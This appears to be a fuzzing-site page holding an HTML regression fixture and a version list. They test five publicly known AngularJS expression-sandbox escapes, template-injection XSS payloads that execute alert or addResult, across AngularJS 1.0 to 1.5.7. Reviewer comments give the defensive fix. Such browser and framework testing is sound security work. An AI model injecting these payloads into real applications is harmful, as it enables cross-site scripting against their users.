AngularJS Sandbox Bypasses

Fully working AngularJS expression-sandbox bypasses for different AngularJS versions, curated from the community

By
skeptic_fx 1 Seen 2062 times
Tags
angular angularjs xss bypass sandbox

Results


Tested on
Chrome - 67 - Windows 10
Fuzz data
lol

Tested on
Firefox - 60 - Mac OS X
Fuzz data
lol

Tested on
Chrome Mobile - 41 - Android
Fuzz data
lol

Tested on
Googlebot - 2.1 - undefined
Fuzz data
lol

Tested on
Chromium - 56 - Ubuntu
Fuzz data
lol

Tested on
Safari - 10.1.2 - Mac OS X
Fuzz data
lol

Tested on
Opera - 52 - Windows 7
Fuzz data
lol

User Script (FUZZER)

					
<!DOCTYPE html>
<html>
<!--
  Regression fixture for the AngularJS expression sandbox.
  Each interpolation inside the ng-app element below is a publicly known sandbox
  escape. If one of them still evaluates on the AngularJS build that was loaded,
  it calls addResult(), which is not defined on this page (presumably supplied
  by the fuzzer harness; confirm).

  Defender's reading: a hit means the loaded build runs attacker-controlled
  template text as JavaScript. The expression sandbox was never a security
  boundary and was removed in AngularJS 1.6, so upgrading alone is not the fix.
  The fix is to keep untrusted input out of anything AngularJS compiles as a
  template: do not render user data server-side into an ng-app region, or mark
  such regions ng-non-bindable.
-->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/***DS_ANGULARJS_VERSIONS***/angular.min.js"></script>
<script>
    // '***DS_ANGULARJS_VERSIONS***' looks like a harness placeholder that is
    // replaced with one entry of the fuzz-data list per run (TODO confirm).
    // Dots are turned into underscores to form a version tag, e.g. 1_5_7.
    var ver = '***DS_ANGULARJS_VERSIONS***'.replace(/\./g, '_');
    // Result labels: version tag plus the text of the expression under test.
    // They are plain strings here; the template expressions below refer to
    // them by name as the argument to addResult().
    var aVector = ver + " -- a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')";
    var bVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
    var cVector = ver + " -- c=toString.constructor;p=c.prototype;p.toString=p.call;[\"a\",\"alert(1)\"].sort(c)";
    var dVector = ver + " -- (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()";
    // eVector is character-for-character the same label as bVector.
    var eVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
    // NOTE(review): this overwrites all five labels with 'lol', so the
    // assignments above have no effect and every recorded result carries the
    // same fuzz data. A result then cannot be traced back to a vector or an
    // AngularJS version. Looks like a leftover debugging override; confirm
    // before removing.
    aVector=bVector=cVector=dVector=eVector='lol';
</script>
<body>
<!--
  The "// a", "// b" ... lines inside the element below are not comments. They
  are text nodes rendered on the page that label the version range each
  expression is claimed to cover. Vectors b and e use the same expression and
  differ only in the label variable they report.
-->

<div ng-app="">
// a -  Versions 1.3.0 - 1.5.7:
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,addResult(aVector),a')}}
 
// b - Versions 1.2.20 - 1.2.29:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=bVector),"')}}
 
// c - Version 1.2.19:
{{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","addResult(cVector)"].sort(c)}}
 
// d - Versions 1.2.6 - 1.2.18:
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'addResult(dVector)')()}}
 
// e - Versions 1.2.0 - 1.2.5:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=eVector),"')}}



<p>Input something in the input box:</p>
<p>Name: <input type="text" ng-model="name"></p>
<p ng-bind="name"></p>

</div>

</body>
</html>


					
				

Fuzz Data (FUZZER)

					
// Fuzz dictionary: the AngularJS releases the fixture is run against, newest
// first. Presumably the harness substitutes one entry per run for the
// ***DS_ANGULARJS_VERSIONS*** placeholder in the user script (TODO confirm).
// `var` is kept so the name stays a global the harness can look up.
// NOTE(review): the list ends at 1.5.7 and 1.2.27, while the fixture text
// labels vector b as covering up to 1.2.29; 1.0.x is listed although no
// vector is labelled for it.
var DS_ANGULARJS_VERSIONS = [
  // 1.5.x
  "1.5.7", "1.5.6", "1.5.5", "1.5.4", "1.5.3", "1.5.2", "1.5.1", "1.5.0",
  // 1.4.x
  "1.4.12", "1.4.11", "1.4.10", "1.4.9", "1.4.8", "1.4.7", "1.4.6",
  "1.4.5", "1.4.4", "1.4.3", "1.4.2", "1.4.1", "1.4.0",
  // 1.3.x
  "1.3.17", "1.3.16", "1.3.15", "1.3.14", "1.3.13", "1.3.12", "1.3.11",
  "1.3.10", "1.3.9", "1.3.8", "1.3.7", "1.3.6", "1.3.5", "1.3.4", "1.3.3",
  "1.3.2", "1.3.1", "1.3.0",
  // 1.2.x
  "1.2.27", "1.2.26", "1.2.25", "1.2.24", "1.2.23", "1.2.22", "1.2.21",
  "1.2.20", "1.2.19", "1.2.18", "1.2.17", "1.2.16", "1.2.15", "1.2.14",
  "1.2.13", "1.2.12", "1.2.11", "1.2.10", "1.2.9", "1.2.8", "1.2.7",
  "1.2.6", "1.2.5", "1.2.4", "1.2.3", "1.2.2", "1.2.1", "1.2.0",
  // 1.0.x
  "1.0.8", "1.0.7", "1.0.6", "1.0.5", "1.0.4", "1.0.3", "1.0.2", "1.0.1"
];